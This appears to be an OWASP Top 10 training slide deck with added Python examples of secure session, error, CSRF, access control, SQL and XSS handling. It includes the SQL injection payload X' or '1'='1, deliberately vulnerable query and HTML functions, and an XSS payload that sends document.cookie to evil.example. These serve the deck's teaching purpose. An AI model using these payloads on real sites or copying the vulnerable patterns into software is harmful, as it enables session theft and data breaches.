vulnerabilities
¤ Allows organizations to have insight into why their applications have vulnerabilities
¤ Aids in understanding the consequences
¤ Good starting point to implement a secure coding strategy
¤ Not a standard!
OWASP Top 10 - Brett Hardin

attacks target the application and not the infrastructure (Gartner)
¤ Attack surface is huge (millions of lines of code)
¤ A single vulnerability can lead to catastrophic failure
¤ Network controls do nothing to stop application attacks

constructed from the MITRE vulnerability trends for 2006
¤ Only focused on vulnerabilities that affect web applications
¤ Exception is cryptographic vulnerabilities
¤ Represent the root cause of many privacy leaks and compliance issues (PCI)
¤ Focus is on vulnerabilities, not attacks

a page that doesn't have the correct access control policy in place.
¤ Having a page that is "hidden" from the users.
¤ Pages that check privileges on the client but not on the server.
¤ Attackers find these pages through forceful browsing (guessing or brute-forcing URLs).
¤ Susceptible pages may still follow out-of-date access control policies.

¤ Exposes functionality to unauthorized users
¤ Loss of a record trail
¤ Can potentially bypass session management
¤ Prevents good auditing from taking place

Careful planning
¤ Do not assume users will be unaware of hidden functionality
¤ Block access to all file types that your application doesn't serve
¤ Create an access control matrix
¤ It should cover every URL and every business function, and be enforced on the server for every request

sensitive transactions
¤ Not securing client-to-server connections
¤ Not securing server-to-database connections
¤ Not securing other back end connections that pass sensitive data

sensitive transactions
¤ Complete confidentiality loss
¤ Can't trust that the information being sent stays private
¤ Complete integrity loss
¤ Can't trust that the information received is what was actually sent

sensitive information
¤ If it's sensitive and stored, it needs to be encrypted.
¤ Examples of sensitive items include:
¤ Credit cards
¤ Passwords (these should be stored as salted, slow hashes rather than reversibly encrypted)
¤ User data?

your own cryptographic algorithms (homegrown)
¤ Don't use weak algorithms (RC4, MD5, SHA-1)
¤ Generate and store private keys with care
¤ Ensure encrypted data at rest is not easy to decrypt (the key must not sit next to the ciphertext)

Failure to protect credentials
¤ User login from an unencrypted page
¤ Password reset enumeration
¤ Password/username sent in email
Failure to protect session tokens
¤ Session tokens used in the URL
¤ Session tokens stored persistently in a cookie
¤ Session timeouts are too long

Relies upon protection from Secure Communication (A9) and Cryptographic Storage (A8)
¤ DO NOT write your own session handlers!
¤ Applications should rely on robust, well-proven SSO or authentication systems
¤ DO NOT allow login from an unencrypted page
¤ Issue a new session identifier after successful authentication (prevents session fixation)
¤ Use timeouts for inactive sessions
¤ Verify the current password when using change-password functionality

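The three server-side rules above (new session id after login, inactivity timeout, re-check the current password on change), as an added example that is not part of the slide deck. The in-memory USERS table, the 15-minute idle limit and the injectable clock are assumptions for the demo; a real application would use its framework's session store.

```python
import hashlib
import hmac
import secrets
import time

# Constructed user table: username -> (salt, PBKDF2-SHA256 digest). Assumed stand-in for a real backend.
USERS = {}
PBKDF2_ROUNDS = 100_000
IDLE_TIMEOUT = 15 * 60  # seconds; assumed inactivity limit


def set_password(username, password):
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    USERS[username] = (salt, digest)


def verify_password(username, password):
    record = USERS.get(username)
    if record is None:
        return False
    salt, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(digest, candidate)  # constant-time compare


class SessionStore:
    """Server-side session table: session id -> {"user", "last_seen"}.

    `clock` is injectable so the idle timeout can be exercised without sleeping.
    """

    def __init__(self, idle_timeout=IDLE_TIMEOUT, clock=time.time):
        self._sessions = {}
        self._idle_timeout = idle_timeout
        self._clock = clock

    def _new_id(self):
        # 256 bits from the OS CSPRNG; never a counter, timestamp or hash of the username
        return secrets.token_urlsafe(32)

    def start_anonymous(self):
        """Pre-login session (shopping cart, language choice). Bound to no user yet."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last_seen": self._clock()}
        return sid

    def login(self, old_sid, username, password):
        """On success, retire the pre-login id and issue a fresh one.

        Keeping the old id would let an attacker who planted it in the victim's
        browser (session fixation) inherit the authenticated session.
        """
        if not verify_password(username, password):
            return None
        self._sessions.pop(old_sid, None)
        sid = self._new_id()
        self._sessions[sid] = {"user": username, "last_seen": self._clock()}
        return sid

    def current_user(self, sid):
        """Resolve a session id to a user, expiring idle sessions on the server side."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess["last_seen"] > self._idle_timeout:
            del self._sessions[sid]  # a cookie expiry set in the browser alone is not enforcement
            return None
        sess["last_seen"] = now
        return sess["user"]

    def change_password(self, sid, current_password, new_password):
        """Require the current password: a hijacked session must not become a permanent takeover."""
        user = self.current_user(sid)
        if user is None or not verify_password(user, current_password):
            return False
        set_password(user, new_password)
        return True
```

The store never trusts the cookie value by itself: the id is only meaningful while the server-side record exists and has been touched within the idle window.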
¤ Unintentionally leaking information about configuration or internal workings
¤ Leaking internal state
¤ Revealing debug information to users
¤ Examples:
¤ Stack traces
¤ Failed SQL statements
¤ Path information
¤ Debug information

Risk
¤ Fingerprinting servers
¤ Displaying errors can potentially lead to additional compromise
¤ SQL error messages tell an attacker exactly how to shape an Injection Flaw (A2) payload

¤ Suppress errors from users (log them instead)
¤ Create a custom error handler
¤ Use a standard exception handling architecture
¤ Prevents different HTTP error codes from being returned for different failure causes
¤ Potentially use random / unique error reference codes (shown to the user, looked up in the log)
¤ Development team should use a common approach
¤ Various layers (database) may also return exceptions
¤ Overriding error codes with 200 OK

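A custom error handler of the kind the slide describes, as an added example (not the deck's code): the leaky handler ships the failed SQL and a stack trace to the client, the hardened one logs the detail under a random reference id and returns only that id. The in-memory database, the ListHandler that captures the server log, and the RuntimeError wrapping are constructed for the demo.

```python
import logging
import secrets
import sqlite3
import traceback


class ListHandler(logging.Handler):
    """Keeps formatted log lines in memory so the example can show what the
    server side recorded. A real deployment writes to a file or log pipeline."""

    def __init__(self):
        super().__init__()
        self.lines = []

    def emit(self, record):
        self.lines.append(self.format(record))


log = logging.getLogger("app.errors")
log.propagate = False
SERVER_LOG = ListHandler()
log.addHandler(SERVER_LOG)

GENERIC_BODY = "An internal error occurred. Reference: {ref}"


def fragile_lookup(username):
    """Constructed handler: builds SQL by concatenation, so a quote in the input
    makes the database throw (also an injection flaw, A2; here we only watch the error)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    sql = "SELECT * FROM users WHERE name = '" + username + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # common anti-pattern: re-raise with the statement attached "to help debugging"
        raise RuntimeError("query failed: " + sql) from exc


def leaky_handler(username):
    """The A6 anti-pattern: raw exception text and stack trace go straight to the client."""
    try:
        return 200, str(fragile_lookup(username))
    except Exception as exc:
        return 500, "Database error: " + str(exc) + "\n" + traceback.format_exc()


def handle_request(handler, *args):
    """Custom error handler: log the detail under a random reference id, return only the id."""
    try:
        return 200, str(handler(*args))
    except Exception as exc:
        ref = secrets.token_hex(8)  # unique per failure, unguessable, useless to an attacker
        log.error("ref=%s exc=%s: %s\n%s", ref, type(exc).__name__, exc, traceback.format_exc())
        return 500, GENERIC_BODY.format(ref=ref)


INTERNAL_MARKERS = ("SELECT", "Traceback", "sqlite3", ".py")


def leaks_internals(body):
    """Crude check: does the client-visible body contain implementation detail?"""
    return any(marker in body for marker in INTERNAL_MARKERS)
```

Every failure path returns the same status and body shape, so the response no longer distinguishes a database syntax error from a missing file; the support team correlates the reference with the server log.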
Forces the victim's browser to send a request to an application in which the victim already has an established session.
¤ The attack code is usually not hosted on the site that suffers from the vulnerability
¤ Exploits the trust a site has in the user's browser (the browser attaches the session cookie automatically)
¤ WIDESPREAD! (Sleeping Giant)

Require authentication on GET/POST
¤ Use custom random tokens when making sensitive transactions
¤ Verify the submitted token is correct for the current user
¤ Have adequate timeouts for sessions
¤ In addition, check the HTTP Referer header
¤ Check for crossdomain.xml files (Flash)

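The token and Referer checks above, as an added example (not the deck's code). The token is an HMAC-SHA256 over the session id under a server-only key, so it is unguessable, bound to one user's session, and cannot be read by a page on another origin; the SERVER_SECRET, TRUSTED_ORIGIN, SESSIONS table and the two request dicts are all constructed for the demo.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # assumed: per-deployment key that never leaves the server
TRUSTED_ORIGIN = "https://bank.example"  # assumed site origin
SESSIONS = {"sess-victim": "alice"}      # constructed: session id -> authenticated user


def issue_csrf_token(session_id):
    """Token bound to the session. The page embeds it in a hidden form field;
    a cross-site page cannot read it because of the same-origin policy."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id, submitted):
    if not submitted:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def handle_transfer(request):
    """Server side of a money transfer. `request` is a constructed dict with
    "method", "cookies", "headers" and "form". Returns (status, message)."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return 401, "authentication required"            # checked on every request, GET or POST
    if request["method"] != "POST":
        return 405, "state change needs POST"             # a GET can be fired by a plain <img src>
    if not csrf_token_valid(request["cookies"]["session"], request["form"].get("csrf_token")):
        return 403, "missing or wrong CSRF token"         # must match THIS user's session
    referer = request["headers"].get("Referer")
    if referer is not None and not referer.startswith(TRUSTED_ORIGIN + "/"):
        return 403, "cross-site Referer"                  # absent Referer tolerated: proxies strip it
    return 200, f"{user} sent {request['form']['amount']} to {request['form']['to']}"


def legitimate_request():
    """Constructed: the bank's own form, rendered with the session's token."""
    return {
        "method": "POST",
        "cookies": {"session": "sess-victim"},
        "headers": {"Referer": TRUSTED_ORIGIN + "/transfer"},
        "form": {"to": "bob", "amount": "10", "csrf_token": issue_csrf_token("sess-victim")},
    }


def forged_request():
    """Constructed: an auto-submitting form on evil.example. The browser attaches the
    victim's cookie, but the attacker cannot know the token and the Referer is foreign."""
    return {
        "method": "POST",
        "cookies": {"session": "sess-victim"},
        "headers": {"Referer": "https://evil.example/pwn.html"},
        "form": {"to": "mallory", "amount": "10000"},
    }
```

The Referer check is deliberately the last and weakest line: it only rejects a mismatching value, because privacy tools and some proxies remove the header from legitimate requests.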
a reference to an internal implementation object
¤ Database record
¤ Internal URL
¤ File
¤ Attacker modifies the direct object reference to access other objects

indirect reference maps
¤ Direct references (sequential ids, file names) can be easily guessed
¤ Avoid exposing private objects to users
¤ If a direct object reference must be used:
¤ Ensure the user is authorized to view the object
¤ Validate private object references with an "accept known good" approach

to Data: $sql = "SELECT * FROM accounts WHERE account_number = " . $safe_request["account_number"] . " AND user_id = " . $authenticated_data["user_id"];
¤ The validated account number alone is not enough: the query is also keyed on the authenticated user's id, so a tampered account number returns nothing unless that user owns the account

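The two authorization slides (the access control matrix for every URL, and the indirect reference map plus the owner-keyed query above) combined in one added example that is not the deck's code. ACCESS_MATRIX, the three accounts, the roles and the handle length are constructed assumptions; the query is the slide's, written as a parameterised statement.

```python
import secrets
import sqlite3

# Access control matrix: URL -> roles allowed to reach it. Constructed sample policy;
# anything not listed (including "hidden" admin pages) is denied by default.
ACCESS_MATRIX = {
    "/account/view":  {"customer", "teller", "admin"},
    "/account/close": {"teller", "admin"},
    "/admin/users":   {"admin"},
}


def url_permitted(path, role):
    """Enforced on the server for every request, whether or not the UI shows a link."""
    return role in ACCESS_MATRIX.get(path, set())


class ReferenceMap:
    """Per-session indirect reference map: random opaque handle <-> real record id.
    The client only ever sees handles it was issued, so it cannot enumerate other ids."""

    def __init__(self):
        self._handle_to_id = {}
        self._id_to_handle = {}

    def handle_for(self, record_id):
        handle = self._id_to_handle.get(record_id)
        if handle is None:
            handle = secrets.token_urlsafe(9)  # 72 random bits; not derived from the id
            self._id_to_handle[record_id] = handle
            self._handle_to_id[handle] = record_id
        return handle

    def resolve(self, handle):
        return self._handle_to_id.get(handle)  # None for anything this user was never shown


def make_db():
    """Constructed accounts table: account_number, owning user_id, balance."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (account_number INTEGER PRIMARY KEY, user_id TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [(1001, "alice", 500), (1002, "bob", 9000), (1003, "alice", 25)])
    return conn


def list_accounts(conn, user_id, refmap):
    """Page that lists the caller's accounts and hands out handles instead of account numbers."""
    rows = conn.execute("SELECT account_number FROM accounts WHERE user_id = ?", (user_id,)).fetchall()
    return [refmap.handle_for(acct) for (acct,) in rows]


def view_account(conn, user_id, role, handle, refmap):
    """Same query shape as the slide, parameterised and keyed on the authenticated user.
    Returns (account_number, balance) or None."""
    if not url_permitted("/account/view", role):
        return None
    account_number = refmap.resolve(handle)
    if account_number is None:
        return None
    return conn.execute(
        "SELECT account_number, balance FROM accounts WHERE account_number = ? AND user_id = ?",
        (account_number, user_id),
    ).fetchone()  # None when the account exists but belongs to someone else
```

Two independent checks guard the record: the handle must have been issued to this session, and even a valid handle only returns rows the authenticated user owns.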
users to insert into server-based resources
¤ Strongly validate input using an "accept known good" policy
¤ Add firewall rules to prevent applications from making new outbound connections
¤ Implement a sandbox to isolate applications from one another
¤ Ensure the JVM security manager is enabled

data is sent to an interpreter as part of a command or query.
¤ Vulnerability that "breaks" out of the intended context.
¤ Types of injection flaws:
¤ SQL injection
¤ XML injection
¤ LDAP injection
¤ XPath injection

allow an attacker to:
¤ Create new db entries
¤ Read db entries
¤ Update db records
¤ Delete any arbitrary data available to the application

* from users where username = '" + username + "'";
¤ User inserts: Brett
¤ Db_query = "select * from users where username = 'Brett'";

* from users where username = '" + username + "'";
¤ Attacker inserts: X' or '1'='1
¤ Db_query = "select * from users where username = 'X' or '1'='1'";

Separates SQL logic from supplied data
¤ Validate your input
¤ Use an "accept known good" strategy
¤ Then sanitize (encode/escape) your input
¤ Convert dangerous characters into their harmless form for the interpreter that will read them (e.g. a single quote (') becomes '' inside an SQL string literal, or %27 when URL-encoded; URL-encoding alone does not protect an SQL query)

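The two slides' queries run against a real (in-memory) database, as an added example that is not the deck's code: the concatenated query from the slide beside its parameterised form, plus the two fallbacks the slide lists (accept-known-good validation and quote escaping). The users table and the username policy are constructed assumptions.

```python
import re
import sqlite3


def make_db():
    """Constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Brett", "user"), ("alice", "admin"), ("bob", "user")])
    return conn


def lookup_vulnerable(conn, username):
    """The slide's query built by string concatenation: the data becomes part of the SQL grammar."""
    sql = "select * from users where username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, username):
    """Prepared statement: the SQL text is fixed, the value travels separately to the driver,
    so a quote in the value can never close the string literal."""
    return conn.execute("select * from users where username = ?", (username,)).fetchall()


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")  # accept-known-good: assumed username policy


def username_is_known_good(username):
    """Validation as a first gate: reject anything outside the expected alphabet."""
    return USERNAME_RE.fullmatch(username) is not None


def escape_sql_literal(value):
    """Escaping as a fallback for the rare spots a driver cannot parameterise:
    inside an SQL string literal the only special character is the quote, doubled to ''."""
    return "'" + value.replace("'", "''") + "'"


def lookup_escaped(conn, username):
    return conn.execute("select * from users where username = " + escape_sql_literal(username)).fetchall()
```

With the slide's payload the concatenated query returns every row, while the parameterised and escaped versions look for a user literally named `X' or '1'='1` and find nothing.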
is a type of HTML injection.
¤ XSS allows an attacker to insert client-side script into a page that is then displayed to other users.
¤ XSS exploits the trust a user has in a site.
¤ Extremely common and simple for attackers to find

XSS allows an attacker to insert code into your application and present it to users on your behalf.
¤ Port-scan the intranet
¤ Steal credentials
¤ Steal browser history
¤ Abuse browser vulnerabilities
¤ Log keystrokes
¤ Steal cookies
¤ "Deface" websites

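A reflected search page that echoes the user's term, as an added example that is not the deck's code: the first version reflects the term straight into the HTML (a cookie-stealing script or an attribute break-out becomes live markup), the second encodes it for the two contexts it lands in. The page layout and the evil.example payloads are constructed for the demo.

```python
import html


def render_search_vulnerable(term):
    """Reflects the search term straight into HTML: whatever the user (or a link an
    attacker sent them) supplied becomes markup that runs in the victim's browser."""
    return ('<p>Results for: ' + term + '</p>'
            '<input name="q" value="' + term + '">')


def render_search_safe(term):
    """Encode for the context the data lands in. html.escape with quote=True covers
    text nodes and quoted attribute values, the two contexts used here; a value
    placed inside a <script> block would need JavaScript-string encoding instead."""
    encoded = html.escape(term, quote=True)
    return ('<p>Results for: ' + encoded + '</p>'
            '<input name="q" value="' + encoded + '">')


def contains_live_markup(page, fragment="<script"):
    """Does the rendered page still contain an un-encoded tag or attribute from the input?"""
    return fragment in page


# Constructed payloads: one steals the session cookie, one breaks out of the value attribute.
COOKIE_THEFT = "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"
ATTRIBUTE_BREAKOUT = '" autofocus onfocus="alert(1)'
```

Encoding happens at output time, per context, rather than by trying to strip "bad" characters from the input: the same string is harmless as text and dangerous as markup.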
find all of the vulnerabilities in the OWASP Top 10.
¤ Developers should be fully versed in the OWASP Top 10
¤ Prevents new code from being developed insecurely
¤ Have code reviews
¤ Hire a developer to specifically look at code from a security perspective

application, you need to introduce the OWASP Top 10 to your developers.
¤ "An ounce of prevention is worth a pound of cure." (Benjamin Franklin)